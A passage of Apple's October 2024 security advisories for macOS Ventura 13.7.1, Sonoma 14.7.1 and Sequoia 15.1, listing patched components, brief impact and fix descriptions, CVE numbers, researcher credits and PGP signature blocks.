CVE-2024-44275: Arsenii Kostromin (0x3c3e)

PackageKit  
Available for: macOS Ventura  
Impact: An attacker with root privileges may be able to delete protected  
system files  
Description: A path deletion vulnerability was addressed by preventing  
vulnerable code from running with privileges.  
CVE-2024-44294: Mickey Jin (@patch1t)

Screen Capture  
Available for: macOS Ventura  
Impact: An attacker with physical access may be able to share items from  
the lock screen  
Description: The issue was addressed with improved checks.  
CVE-2024-44137: Halle Winkler, Politepix @hallewinkler

Shortcuts  
Available for: macOS Ventura  
Impact: An app may be able to access sensitive user data  
Description: This issue was addressed with improved redaction of  
sensitive information.  
CVE-2024-44254: Kirin (@Pwnrin)

Shortcuts  
Available for: macOS Ventura  
Impact: A malicious app may use shortcuts to access restricted files  
Description: A logic issue was addressed with improved checks.  
CVE-2024-44269: an anonymous researcher

sips  
Available for: macOS Ventura  
Impact: Processing a maliciously crafted file may lead to unexpected app  
termination  
Description: An out-of-bounds access issue was addressed with improved  
bounds checking.  
CVE-2024-44236: Hossein Lotfi (@hosselot) of Trend Micro Zero Day  
Initiative  
CVE-2024-44237: Hossein Lotfi (@hosselot) of Trend Micro Zero Day  
Initiative

sips  
Available for: macOS Ventura  
Impact: Parsing a maliciously crafted file may lead to an unexpected app  
termination  
Description: An out-of-bounds write issue was addressed with improved  
input validation.  
CVE-2024-44284: Junsung Lee, dw0r! working with Trend Micro Zero Day  
Initiative

sips  
Available for: macOS Ventura  
Impact: Parsing a file may lead to disclosure of user information  
Description: An out-of-bounds read was addressed with improved input  
validation.  
CVE-2024-44279: Hossein Lotfi (@hosselot) of Trend Micro Zero Day  
Initiative  
CVE-2024-44281: Hossein Lotfi (@hosselot) of Trend Micro Zero Day  
Initiative

sips  
Available for: macOS Ventura  
Impact: Parsing a maliciously crafted file may lead to an unexpected app  
termination  
Description: An out-of-bounds read was addressed with improved bounds  
checking.  
CVE-2024-44283: Hossein Lotfi (@hosselot) of Trend Micro Zero Day  
Initiative

Siri  
Available for: macOS Ventura  
Impact: A sandboxed app may be able to access sensitive user data in  
system logs  
Description: An information disclosure issue was addressed with improved  
private data redaction for log entries.  
CVE-2024-44278: Kirin (@Pwnrin)

SystemMigration  
Available for: macOS Ventura  
Impact: A malicious app may be able to create symlinks to protected  
regions of the disk  
Description: This issue was addressed with improved validation of  
symlinks.  
CVE-2024-44264: Mickey Jin (@patch1t)

WindowServer  
Available for: macOS Ventura  
Impact: An app may be able to access sensitive user data  
Description: This issue was addressed with improved redaction of  
sensitive information.  
CVE-2024-44257: Bohdan Stasiuk (@Bohdan_Stasiuk)

Additional recognition

NetworkExtension  
We would like to acknowledge Patrick Wardle of DoubleYou & the  
Objective-See Foundation for their assistance.

Security  
We would like to acknowledge Bing Shi, Wenchao Li and Xiaolong Bai of  
Alibaba Group for their assistance.

Spotlight  
We would like to acknowledge Paulo Henrique Batista Rosa de Castro  
(@paulohbrc) for their assistance.

macOS Ventura 13.7.1 may be obtained from the Mac App Store or  
Apple's Software Downloads web site:  
https://support.apple.com/downloads/

All information is also posted on the Apple Security Releases  
web site: https://support.apple.com/100100.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/

-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEsz9altA7uTI+rE/qX+5d1TXaIvoFAmcgAA8ACgkQX+5d1TXa  
IvrXBg/8DeQSQAigpeRoMRWyyfrezV21cUXKEUCAjoJhrdQmSg37fyGZNPeWsSxQ  
gGqvh8sGPaI6iKFpd2hY9a9CyJGnBmH0AwjeU0evvmqclrQaYEuHZosaR1yyiemt  
wjTAt9IvtaT0oLJ4ic+pdu4jXgc/pbzg25bwNbzG7S/pMFs/by7yAJt9duOGFkMC  
5FuLFdpASL1uZ3Mh3o1tIxexLV+UBv2duTdYhJSKDTvD9GDZ4KLKlcujt1XnF76o  
uu7TPx7mh6oZwTk/1nhZqkIlaJyJPKv7Qf+za6FfEjpw+jU8QNnQQFPIq2wc1qR3  
rzsbDubRoTPt0a59Q3z2sbDlRxk3Phuq6o58PJS+FcAEOqCSeChNIDDMoFvSKs7M  
MdxFHtyVDhUPyaJMyjnzpOTqxCn2yxbdgg1fgP5PiWeyK963zmpgnSmm/Rqrtj4Y  
Y0ObbeKn4MArTc+7vMSJb/f2WtsJPn5MufpUPNhXp2OTdXOVEoa+MIO+BDHc+32d  
AXnwXLWEec7FnSILyWTd+lApPKy4+ptn1asnDrhz1s3VuGC27mImtxh0kn9JUfFT  
kFXX9ct8G2AybkxOLMYmen5fb/33Ypbb1AJp7n0776d1qpomsIUdSkEJs7/CAIcb  
vWc21lLZdoaYfd7KmL/9Y/n0S5AihmqXmsDQKQ4+lrxJmU4xww0=  
=cN79  
-----END PGP SIGNATURE-----

Apple Security Advisory 10-28-2024-5

Apple Security Advisory 10-28-2024-4 - macOS Sonoma 14.7.1 addresses buffer overflow, bypass, information leakage, out of bounds access, out of bounds read, and out of bounds write vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-10-28-2024-4 macOS Sonoma 14.7.1

macOS Sonoma 14.7.1 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/121570.

Apple maintains a Security Releases page at  
https://support.apple.com/100100 which lists recent  
software updates with security advisories.

App Support  
Available for: macOS Sonoma  
Impact: A malicious app may be able to run arbitrary shortcuts without  
user consent  
Description: A path handling issue was addressed with improved logic.  
CVE-2024-44255: an anonymous researcher

AppleMobileFileIntegrity  
Available for: macOS Sonoma  
Impact: A sandboxed process may be able to circumvent sandbox  
restrictions  
Description: A logic issue was addressed with improved validation.  
CVE-2024-44270: Mickey Jin (@patch1t)

AppleMobileFileIntegrity  
Available for: macOS Sonoma  
Impact: An app may be able to modify protected parts of the file system  
Description: A downgrade issue affecting Intel-based Mac computers was  
addressed with additional code-signing restrictions.  
CVE-2024-44280: Mickey Jin (@patch1t)

Assets  
Available for: macOS Sonoma  
Impact: A malicious app with root privileges may be able to modify the  
contents of system files  
Description: This issue was addressed by removing the vulnerable code.  
CVE-2024-44260: Mickey Jin (@patch1t)

CoreMedia Playback  
Available for: macOS Sonoma  
Impact: A malicious app may be able to access private information  
Description: This issue was addressed with improved handling of  
symlinks.  
CVE-2024-44273: pattern-f (@pattern_F_), Hikerell of Loadshine Lab

CoreServicesUIAgent  
Available for: macOS Sonoma  
Impact: An app may be able to modify protected parts of the file system  
Description: This issue was addressed with additional entitlement  
checks.  
CVE-2024-44295: an anonymous researcher

CoreText  
Available for: macOS Sonoma  
Impact: Processing a maliciously crafted font may result in the  
disclosure of process memory  
Description: The issue was addressed with improved checks.  
CVE-2024-44240: Hossein Lotfi (@hosselot) of Trend Micro Zero Day  
Initiative  
CVE-2024-44302: Hossein Lotfi (@hosselot) of Trend Micro Zero Day  
Initiative

CUPS  
Available for: macOS Sonoma  
Impact: An attacker in a privileged network position may be able to leak  
sensitive user information  
Description: An issue existed in the parsing of URLs. This issue was  
addressed with improved input validation.  
CVE-2024-44213: Alexandre Bedard

DiskArbitration  
Available for: macOS Sonoma  
Impact: A sandboxed app may be able to access sensitive user data  
Description: The issue was addressed with improved checks.  
CVE-2024-40855: Csaba Fitzl (@theevilbit) of Kandji

Find My  
Available for: macOS Sonoma  
Impact: An app may be able to read sensitive location information  
Description: A privacy issue was addressed with improved private data  
redaction for log entries.  
CVE-2024-44289: Kirin (@Pwnrin)

Foundation  
Available for: macOS Sonoma  
Impact: Parsing a file may lead to disclosure of user information  
Description: An out-of-bounds read was addressed with improved input  
validation.  
CVE-2024-44282: Hossein Lotfi (@hosselot) of Trend Micro Zero Day  
Initiative

Game Controllers  
Available for: macOS Sonoma  
Impact: An attacker with physical access can input Game Controller  
events to apps running on a locked device  
Description: The issue was addressed by restricting options offered on a  
locked device.  
CVE-2024-44265: Ronny Stiftel

ImageIO  
Available for: macOS Sonoma  
Impact: Processing an image may result in disclosure of process memory  
Description: This issue was addressed with improved checks.  
CVE-2024-44215: Junsung Lee working with Trend Micro Zero Day Initiative

ImageIO  
Available for: macOS Sonoma  
Impact: Processing a maliciously crafted message may lead to a denial-  
of-service  
Description: The issue was addressed with improved bounds checks.  
CVE-2024-44297: Jex Amro

Installer  
Available for: macOS Sonoma  
Impact: An app may be able to access user-sensitive data  
Description: An access issue was addressed with additional sandbox  
restrictions.  
CVE-2024-44216: Zhongquan Li (@Guluisacat)

Installer  
Available for: macOS Sonoma  
Impact: A malicious application may be able to modify protected parts of  
the file system  
Description: The issue was addressed with improved checks.  
CVE-2024-44287: Mickey Jin (@patch1t)

IOGPUFamily  
Available for: macOS Sonoma  
Impact: A malicious app may be able to cause a denial-of-service  
Description: The issue was addressed with improved memory handling.  
CVE-2024-44197: Wang Yu of Cyberserval

Kernel  
Available for: macOS Sonoma  
Impact: An app may be able to leak sensitive kernel state  
Description: An information disclosure issue was addressed with improved  
private data redaction for log entries.  
CVE-2024-44239: Mateusz Krzywicki (@krzywix)

Kernel  
Available for: macOS Sonoma  
Impact: An app may be able to access sensitive user data  
Description: This issue was addressed with improved validation of  
symlinks.  
CVE-2024-44175: Csaba Fitzl (@theevilbit) of Kandji

LaunchServices  
Available for: macOS Sonoma  
Impact: An application may be able to break out of its sandbox  
Description: A logic issue was addressed with improved checks.  
CVE-2024-44122: an anonymous researcher

Maps  
Available for: macOS Sonoma  
Impact: An app may be able to read sensitive location information  
Description: This issue was addressed with improved redaction of  
sensitive information.  
CVE-2024-44222: Kirin (@Pwnrin)

Messages  
Available for: macOS Sonoma  
Impact: An app may be able to break out of its sandbox  
Description: The issue was addressed with improved input sanitization.  
CVE-2024-44256: Mickey Jin (@patch1t)

PackageKit  
Available for: macOS Sonoma  
Impact: An app may be able to bypass Privacy preferences  
Description: A path deletion vulnerability was addressed by preventing  
vulnerable code from running with privileges.  
CVE-2024-44159: Mickey Jin (@patch1t)  
CVE-2024-44156: Arsenii Kostromin (0x3c3e)

PackageKit  
Available for: macOS Sonoma  
Impact: An app may be able to modify protected parts of the file system  
Description: A permissions issue was addressed with additional  
restrictions.  
CVE-2024-44196: Csaba Fitzl (@theevilbit) of Kandji

PackageKit  
Available for: macOS Sonoma  
Impact: An app may be able to modify protected parts of the file system  
Description: The issue was addressed with improved checks.  
CVE-2024-44253: Mickey Jin (@patch1t), Csaba Fitzl (@theevilbit) of  
Kandji

PackageKit  
Available for: macOS Sonoma  
Impact: A malicious application may be able to modify protected parts of  
the file system  
Description: The issue was addressed with improved checks.  
CVE-2024-44247: Un3xploitable of CW Research Inc  
CVE-2024-44267: Bohdan Stasiuk (@Bohdan_Stasiuk), Un3xploitable of CW  
Research Inc, Pedro Tôrres (@t0rr3sp3dr0)  
CVE-2024-44301: Bohdan Stasiuk (@Bohdan_Stasiuk), Un3xploitable of CW  
Research Inc, Pedro Tôrres (@t0rr3sp3dr0)  
CVE-2024-44275: Arsenii Kostromin (0x3c3e)

PackageKit  
Available for: macOS Sonoma  
Impact: An attacker with root privileges may be able to delete protected  
system files  
Description: A path deletion vulnerability was addressed by preventing  
vulnerable code from running with privileges.  
CVE-2024-44294: Mickey Jin (@patch1t)

SceneKit  
Available for: macOS Sonoma  
Impact: Processing a maliciously crafted file may lead to unexpected app  
termination  
Description: A buffer overflow was addressed with improved size  
validation.  
CVE-2024-44144: 냥냥

SceneKit  
Available for: macOS Sonoma  
Impact: Processing a maliciously crafted file may lead to heap  
corruption  
Description: This issue was addressed with improved checks.  
CVE-2024-44218: Michael DePlante (@izobashi) of Trend Micro Zero Day  
Initiative

Screen Capture  
Available for: macOS Sonoma  
Impact: An attacker with physical access may be able to share items from  
the lock screen  
Description: The issue was addressed with improved checks.  
CVE-2024-44137: Halle Winkler, Politepix @hallewinkler

Shortcuts  
Available for: macOS Sonoma  
Impact: An app may be able to access sensitive user data  
Description: This issue was addressed with improved redaction of  
sensitive information.  
CVE-2024-44254: Kirin (@Pwnrin)

Shortcuts  
Available for: macOS Sonoma  
Impact: A malicious app may use shortcuts to access restricted files  
Description: A logic issue was addressed with improved checks.  
CVE-2024-44269: an anonymous researcher

sips  
Available for: macOS Sonoma  
Impact: Processing a maliciously crafted file may lead to unexpected app  
termination  
Description: An out-of-bounds access issue was addressed with improved  
bounds checking.  
CVE-2024-44236: Hossein Lotfi (@hosselot) of Trend Micro Zero Day  
Initiative  
CVE-2024-44237: Hossein Lotfi (@hosselot) of Trend Micro Zero Day  
Initiative

sips  
Available for: macOS Sonoma  
Impact: Parsing a maliciously crafted file may lead to an unexpected app  
termination  
Description: An out-of-bounds write issue was addressed with improved  
input validation.  
CVE-2024-44284: Junsung Lee, dw0r! working with Trend Micro Zero Day  
Initiative

sips  
Available for: macOS Sonoma  
Impact: Parsing a file may lead to disclosure of user information  
Description: An out-of-bounds read was addressed with improved input  
validation.  
CVE-2024-44279: Hossein Lotfi (@hosselot) of Trend Micro Zero Day  
Initiative  
CVE-2024-44281: Hossein Lotfi (@hosselot) of Trend Micro Zero Day  
Initiative

sips  
Available for: macOS Sonoma  
Impact: Parsing a maliciously crafted file may lead to an unexpected app  
termination  
Description: An out-of-bounds read was addressed with improved bounds  
checking.  
CVE-2024-44283: Hossein Lotfi (@hosselot) of Trend Micro Zero Day  
Initiative

Siri  
Available for: macOS Sonoma  
Impact: A sandboxed app may be able to access sensitive user data in  
system logs  
Description: An information disclosure issue was addressed with improved  
private data redaction for log entries.  
CVE-2024-44278: Kirin (@Pwnrin)

SystemMigration  
Available for: macOS Sonoma  
Impact: A malicious app may be able to create symlinks to protected  
regions of the disk  
Description: This issue was addressed with improved validation of  
symlinks.  
CVE-2024-44264: Mickey Jin (@patch1t)

WindowServer  
Available for: macOS Sonoma  
Impact: An app may be able to access sensitive user data  
Description: This issue was addressed with improved redaction of  
sensitive information.  
CVE-2024-44257: Bohdan Stasiuk (@Bohdan_Stasiuk)

Additional recognition

NetworkExtension  
We would like to acknowledge Patrick Wardle of DoubleYou & the  
Objective-See Foundation for their assistance.

Security  
We would like to acknowledge Bing Shi, Wenchao Li and Xiaolong Bai of  
Alibaba Group for their assistance.

Spotlight  
We would like to acknowledge Paulo Henrique Batista Rosa de Castro  
(@paulohbrc) for their assistance.

macOS Sonoma 14.7.1 may be obtained from the Mac App Store or Apple's  
Software Downloads web site: https://support.apple.com/downloads/

All information is also posted on the Apple Security Releases  
web site: https://support.apple.com/100100.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/

-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEsz9altA7uTI+rE/qX+5d1TXaIvoFAmcf/9kACgkQX+5d1TXa  
IvrUURAAwGoAU3ccWvDjKZw0r1ouPDWXvLoCzcHx1nQm18Usoo+GOevgBlJflGAz  
i7H8nUldqtFy3YW/Ttr0/B0ILhPZf/OzVmE4XqwjqNKXI5a7EvC9A9aLUjjcqNV9  
JY6We0EDT+zlOfKaG1SrKhSA7Iqm7sJ6euWotsf3SaJPtVdhabi6rQzi1G5aihsq  
B7w+2uLYg5ctywkwbm8Rl3XmorMIwrTrOokYhx+rZMaZwQGnB8UNrVksdaqaBQHU  
ak1t71gonnGcJxhy9ceK85xk+WwlCItpUGIvWvuvLBX/MxMZzdwIzoIP2SGNh8nV  
SYYmpbdM2fpAbX0gZQBU3zPPZIoi2pyCV37sV2VIgTtjPLVYBrB2XJXPnIU8pmHA  
Abrv7gE6oRY1gJHks1w3iaw8cBMhDVvFd9hr9qfCHikbKsFHfan4oYAQK4SHvxFB  
N9rRrgzGcpDP6l0WT+ae/LmLJHjJpzbu2XuNS2s6h9ohRFwyKXJ70dQku4w/YQIV  
4dciPFkiwNpd3bQpak82bPaIko/ihLT66y6pyi+SfYDfEBgEH45VvuxhZT9+u9z0  
+mxRIc+sPCD4avvt5bU/7q/wDIs0dAW6fjeFo8+KiM9JRPwNbTW+VPpr6QWH6JIy  
BpAEQH9m0WtlqVFurN4oQWOLnO+dUYKSPYS+QZufDfsLGpO+YtY=  
=LeMo  
-----END PGP SIGNATURE-----

Apple Security Advisory 10-28-2024-4

Apple Security Advisory 10-28-2024-3 - macOS Sequoia 15.1 addresses bypass, information leakage, out of bounds access, out of bounds read, out of bounds write, and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-10-28-2024-3 macOS Sequoia 15.1

macOS Sequoia 15.1 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/121564.

Apple maintains a Security Releases page at  
https://support.apple.com/100100 which lists recent  
software updates with security advisories.

Apache  
Impact: Multiple issues existed in Apache  
Description: This is a vulnerability in open source code and Apple  
Software is among the affected projects. The CVE-ID was assigned by a  
third party. Learn more about the issue and CVE-ID at cve.org.  
CVE-2024-39573  
CVE-2024-38477  
CVE-2024-38476

App Support  
Available for: macOS Sequoia  
Impact: A malicious app may be able to run arbitrary shortcuts without  
user consent  
Description: A path handling issue was addressed with improved logic.  
CVE-2024-44255: an anonymous researcher

AppleMobileFileIntegrity  
Available for: macOS Sequoia  
Impact: A sandboxed process may be able to circumvent sandbox  
restrictions  
Description: A logic issue was addressed with improved validation.  
CVE-2024-44270: Mickey Jin (@patch1t)

AppleMobileFileIntegrity  
Available for: macOS Sequoia  
Impact: An app may be able to modify protected parts of the file system  
Description: A downgrade issue affecting Intel-based Mac computers was  
addressed with additional code-signing restrictions.  
CVE-2024-44280: Mickey Jin (@patch1t)

Assets  
Available for: macOS Sequoia  
Impact: A malicious app with root privileges may be able to modify the  
contents of system files  
Description: This issue was addressed by removing the vulnerable code.  
CVE-2024-44260: Mickey Jin (@patch1t)

Contacts  
Available for: macOS Sequoia  
Impact: An app may be able to access information about a user's contacts  
Description: A privacy issue was addressed with improved private data  
redaction for log entries.  
CVE-2024-44298: Kirin (@Pwnrin) and 7feilee

CoreMedia Playback  
Available for: macOS Sequoia  
Impact: A malicious app may be able to access private information  
Description: This issue was addressed with improved handling of  
symlinks.  
CVE-2024-44273: pattern-f (@pattern_F_), Hikerell of Loadshine Lab

CoreServicesUIAgent  
Available for: macOS Sequoia  
Impact: An app may be able to modify protected parts of the file system  
Description: This issue was addressed with additional entitlement  
checks.  
CVE-2024-44295: an anonymous researcher

CoreText  
Available for: macOS Sequoia  
Impact: Processing a maliciously crafted font may result in the  
disclosure of process memory  
Description: The issue was addressed with improved checks.  
CVE-2024-44240: Hossein Lotfi (@hosselot) of Trend Micro Zero Day  
Initiative  
CVE-2024-44302: Hossein Lotfi (@hosselot) of Trend Micro Zero Day  
Initiative

CUPS  
Available for: macOS Sequoia  
Impact: An attacker in a privileged network position may be able to leak  
sensitive user information  
Description: An issue existed in the parsing of URLs. This issue was  
addressed with improved input validation.  
CVE-2024-44213: Alexandre Bedard

Find My  
Available for: macOS Sequoia  
Impact: An app may be able to read sensitive location information  
Description: A privacy issue was addressed with improved private data  
redaction for log entries.  
CVE-2024-44289: Kirin (@Pwnrin)

Foundation  
Available for: macOS Sequoia  
Impact: Parsing a file may lead to disclosure of user information  
Description: An out-of-bounds read was addressed with improved input  
validation.  
CVE-2024-44282: Hossein Lotfi (@hosselot) of Trend Micro Zero Day  
Initiative

Game Controllers  
Available for: macOS Sequoia  
Impact: An attacker with physical access can input Game Controller  
events to apps running on a locked device  
Description: The issue was addressed by restricting options offered on a  
locked device.  
CVE-2024-44265: Ronny Stiftel

ImageIO  
Available for: macOS Sequoia  
Impact: Processing an image may result in disclosure of process memory  
Description: This issue was addressed with improved checks.  
CVE-2024-44215: Junsung Lee working with Trend Micro Zero Day Initiative

ImageIO  
Available for: macOS Sequoia  
Impact: Processing a maliciously crafted message may lead to a denial-  
of-service  
Description: The issue was addressed with improved bounds checks.  
CVE-2024-44297: Jex Amro

Installer  
Available for: macOS Sequoia  
Impact: An app may be able to access user-sensitive data  
Description: An access issue was addressed with additional sandbox  
restrictions.  
CVE-2024-44216: Zhongquan Li (@Guluisacat)

Installer  
Available for: macOS Sequoia  
Impact: A malicious application may be able to modify protected parts of  
the file system  
Description: The issue was addressed with improved checks.  
CVE-2024-44287: Mickey Jin (@patch1t)

IOGPUFamily  
Available for: macOS Sequoia  
Impact: A malicious app may be able to cause a denial-of-service  
Description: The issue was addressed with improved memory handling.  
CVE-2024-44197: Wang Yu of Cyberserval

IOSurface  
Available for: macOS Sequoia  
Impact: An app may be able to cause unexpected system termination or  
corrupt kernel memory  
Description: A use-after-free issue was addressed with improved memory  
management.  
CVE-2024-44285: an anonymous researcher

Kernel  
Available for: macOS Sequoia  
Impact: An app may be able to leak sensitive kernel state  
Description: An information disclosure issue was addressed with improved  
private data redaction for log entries.  
CVE-2024-44239: Mateusz Krzywicki (@krzywix)

Login Window  
Available for: macOS Sequoia  
Impact: A person with physical access to a Mac may be able to bypass  
Login Window during a software update  
Description: This issue was addressed through improved state management.  
CVE-2024-44231: Toomas Römer

Login Window  
Available for: macOS Sequoia  
Impact: An attacker with physical access to a Mac may be able to view  
protected content from the Login Window  
Description: This issue was addressed through improved state management.  
CVE-2024-44223: Jaime Bertran

Maps  
Available for: macOS Sequoia  
Impact: An app may be able to read sensitive location information  
Description: This issue was addressed with improved redaction of  
sensitive information.  
CVE-2024-44222: Kirin (@Pwnrin)

Messages  
Available for: macOS Sequoia  
Impact: An app may be able to break out of its sandbox  
Description: The issue was addressed with improved input sanitization.  
CVE-2024-44256: Mickey Jin (@patch1t)

Notification Center  
Available for: macOS Sequoia  
Impact: An app may be able to access sensitive user data  
Description: A privacy issue was addressed with improved private data  
redaction for log entries.  
CVE-2024-44292: Kirin (@Pwnrin)

Notification Center  
Available for: macOS Sequoia  
Impact: A user may be able to view sensitive user information  
Description: A privacy issue was addressed with improved private data  
redaction for log entries.  
CVE-2024-44293: Kirin (@Pwnrin) and 7feilee

PackageKit  
Available for: macOS Sequoia  
Impact: A malicious application may be able to modify protected parts of  
the file system  
Description: The issue was addressed with improved checks.  
CVE-2024-44247: Un3xploitable of CW Research Inc  
CVE-2024-44267: Bohdan Stasiuk (@Bohdan_Stasiuk), Un3xploitable of CW  
Research Inc, Pedro Tôrres (@t0rr3sp3dr0)  
CVE-2024-44301: Bohdan Stasiuk (@Bohdan_Stasiuk), Un3xploitable of CW  
Research Inc, Pedro Tôrres (@t0rr3sp3dr0)  
CVE-2024-44275: Arsenii Kostromin (0x3c3e)

PackageKit  
Available for: macOS Sequoia  
Impact: An app may be able to bypass Privacy preferences  
Description: A path deletion vulnerability was addressed by preventing  
vulnerable code from running with privileges.  
CVE-2024-44156: Arsenii Kostromin (0x3c3e)  
CVE-2024-44159: Mickey Jin (@patch1t)

PackageKit  
Available for: macOS Sequoia  
Impact: An app may be able to modify protected parts of the file system  
Description: The issue was addressed with improved checks.  
CVE-2024-44253: Mickey Jin (@patch1t), Csaba Fitzl (@theevilbit) of  
Kandji

PackageKit  
Available for: macOS Sequoia  
Impact: An attacker with root privileges may be able to delete protected  
system files  
Description: A path deletion vulnerability was addressed by preventing  
vulnerable code from running with privileges.  
CVE-2024-44294: Mickey Jin (@patch1t)

PackageKit  
Available for: macOS Sequoia  
Impact: An app may be able to modify protected parts of the file system  
Description: A permissions issue was addressed with additional  
restrictions.  
CVE-2024-44196: Csaba Fitzl (@theevilbit) of Kandji

Photos  
Available for: macOS Sequoia  
Impact: An app may be able to access Contacts without user consent  
Description: A permissions issue was addressed with additional  
restrictions.  
CVE-2024-40858: Csaba Fitzl (@theevilbit) of Kandji

Pro Res  
Available for: macOS Sequoia  
Impact: An app may be able to cause unexpected system termination or  
corrupt kernel memory  
Description: The issue was addressed with improved memory handling.  
CVE-2024-44277: an anonymous researcher and Yinyi Wu(@_3ndy1) from Dawn  
Security Lab of JD.com, Inc.

Quick Look  
Available for: macOS Sequoia  
Impact: An app may be able to read arbitrary files  
Description: A logic issue was addressed with improved validation.  
CVE-2024-44195: an anonymous researcher

Safari Downloads  
Available for: macOS Sequoia  
Impact: An attacker may be able to misuse a trust relationship to  
download malicious content  
Description: This issue was addressed through improved state management.  
CVE-2024-44259: Narendra Bhati, Manager of Cyber Security at Suma Soft  
Pvt. Ltd, Pune (India)

Safari Private Browsing  
Available for: macOS Sequoia  
Impact: Private browsing may leak some browsing history  
Description: An information leakage was addressed with additional  
validation.  
CVE-2024-44229: Lucas Di Tomase

Sandbox  
Available for: macOS Sequoia  
Impact: An app may be able to access user-sensitive data  
Description: This issue was addressed with improved validation of  
symlinks.  
CVE-2024-44211: Gergely Kalman (@gergely_kalman) and Csaba Fitzl  
(@theevilbit)

SceneKit  
Available for: macOS Sequoia  
Impact: Processing a maliciously crafted file may lead to heap  
corruption  
Description: This issue was addressed with improved checks.  
CVE-2024-44218: Michael DePlante (@izobashi) of Trend Micro Zero Day  
Initiative

Shortcuts  
Available for: macOS Sequoia  
Impact: An app may be able to access sensitive user data  
Description: This issue was addressed with improved redaction of  
sensitive information.  
CVE-2024-44254: Kirin (@Pwnrin)

Shortcuts  
Available for: macOS Sequoia  
Impact: A malicious app may use shortcuts to access restricted files  
Description: A logic issue was addressed with improved checks.  
CVE-2024-44269: an anonymous researcher

sips  
Available for: macOS Sequoia  
Impact: Processing a maliciously crafted file may lead to unexpected app  
termination  
Description: An out-of-bounds access issue was addressed with improved  
bounds checking.  
CVE-2024-44236: Hossein Lotfi (@hosselot) of Trend Micro Zero Day  
Initiative  
CVE-2024-44237: Hossein Lotfi (@hosselot) of Trend Micro Zero Day  
Initiative

sips  
Available for: macOS Sequoia  
Impact: Parsing a file may lead to disclosure of user information  
Description: An out-of-bounds read was addressed with improved input  
validation.  
CVE-2024-44279: Hossein Lotfi (@hosselot) of Trend Micro Zero Day  
Initiative  
CVE-2024-44281: Hossein Lotfi (@hosselot) of Trend Micro Zero Day  
Initiative

sips  
Available for: macOS Sequoia  
Impact: Parsing a maliciously crafted file may lead to an unexpected app  
termination  
Description: An out-of-bounds read was addressed with improved bounds  
checking.  
CVE-2024-44283: Hossein Lotfi (@hosselot) of Trend Micro Zero Day  
Initiative

sips  
Available for: macOS Sequoia  
Impact: Parsing a maliciously crafted file may lead to an unexpected app  
termination  
Description: An out-of-bounds write issue was addressed with improved  
input validation.  
CVE-2024-44284: Junsung Lee, dw0r! working with Trend Micro Zero Day  
Initiative

Siri  
Available for: macOS Sequoia  
Impact: An app may be able to access sensitive user data  
Description: This issue was addressed with improved redaction of  
sensitive information.  
CVE-2024-44194: Rodolphe Brunetti (@eisw0lf)

Siri  
Available for: macOS Sequoia  
Impact: A sandboxed app may be able to access sensitive user data in  
system logs  
Description: An information disclosure issue was addressed with improved  
private data redaction for log entries.  
CVE-2024-44278: Kirin (@Pwnrin)

SystemMigration  
Available for: macOS Sequoia  
Impact: A malicious app may be able to create symlinks to protected  
regions of the disk  
Description: This issue was addressed with improved validation of  
symlinks.  
CVE-2024-44264: Mickey Jin (@patch1t)

WebKit  
Available for: macOS Sequoia  
Impact: Processing maliciously crafted web content may prevent Content  
Security Policy from being enforced  
Description: The issue was addressed with improved checks.  
WebKit Bugzilla: 278765  
CVE-2024-44296: Narendra Bhati, Manager of Cyber Security at Suma Soft  
Pvt. Ltd, Pune (India)

WebKit  
Available for: macOS Sequoia  
Impact: Processing maliciously crafted web content may lead to an  
unexpected process crash  
Description: A memory corruption issue was addressed with improved input  
validation.  
WebKit Bugzilla: 279780  
CVE-2024-44244: an anonymous researcher, Q1IQ (@q1iqF) and P1umer  
(@p1umer)

WindowServer  
Available for: macOS Sequoia  
Impact: An app may be able to access sensitive user data  
Description: This issue was addressed with improved redaction of  
sensitive information.  
CVE-2024-44257: Bohdan Stasiuk (@Bohdan_Stasiuk)

Additional recognition

Airport  
We would like to acknowledge Bohdan Stasiuk (@Bohdan_Stasiuk),  
K宝(@Pwnrin) for their assistance.

Calculator  
We would like to acknowledge Kenneth Chew for their assistance.

Calendar  
We would like to acknowledge  K宝(@Pwnrin) for their assistance.

ImageIO  
We would like to acknowledge Amir Bazine and Karsten König of  
CrowdStrike Counter Adversary Operations, an anonymous researcher for  
their assistance.

Messages  
We would like to acknowledge Collin Potter, an anonymous researcher for  
their assistance.

NetworkExtension  
We would like to acknowledge Patrick Wardle of DoubleYou & the  
Objective-See Foundation for their assistance.

Notification Center  
We would like to acknowledge Kirin (@Pwnrin) and LFYSec for their  
assistance.

Photos  
We would like to acknowledge James Robertson for their assistance.

Safari Private Browsing  
We would like to acknowledge an anonymous researcher, r00tdaddy for  
their assistance.

Safari Tabs  
We would like to acknowledge Jaydev Ahire for their assistance.

Security  
We would like to acknowledge Bing Shi, Wenchao Li and Xiaolong Bai of  
Alibaba Group for their assistance.

Siri  
We would like to acknowledge Bistrit Dahal for their assistance.

macOS Sequoia 15.1 may be obtained from the Mac App Store or Apple's  
Software Downloads web site: https://support.apple.com/downloads/

All information is also posted on the Apple Security Releases  
web site: https://support.apple.com/100100.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/

-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEsz9altA7uTI+rE/qX+5d1TXaIvoFAmcf/5IACgkQX+5d1TXa  
IvpDBw/9FRph9Y6CcfUCPh6XQXhb25fsLE9L9qkW6gB2aF+/NUC55OGNlHKoxmCU  
WCY//cOs164iB+ETsGqX3I3U6vD/IqVwSfdpRpaNtdaEZnmFZPKLwJ4VzQufZV1a  
N8XxyVaxpPFh/8AmGdm0vqRv7x++brH8Z61Jt4AYdbg5Pph16zDBZxxLHUfTxY5a  
j7GBdCVUwzSF6oSJZl2Mj9SoTfwVHqz2Xyp1x7w9IJKQaUQPfPghhPj15yJH5qTD  
3jiyRdy18TfzXSFMiOGaq/VbeQWIAEO6Vc7138n0T9vMwLsKx/ag3/wkia4LEWJ7  
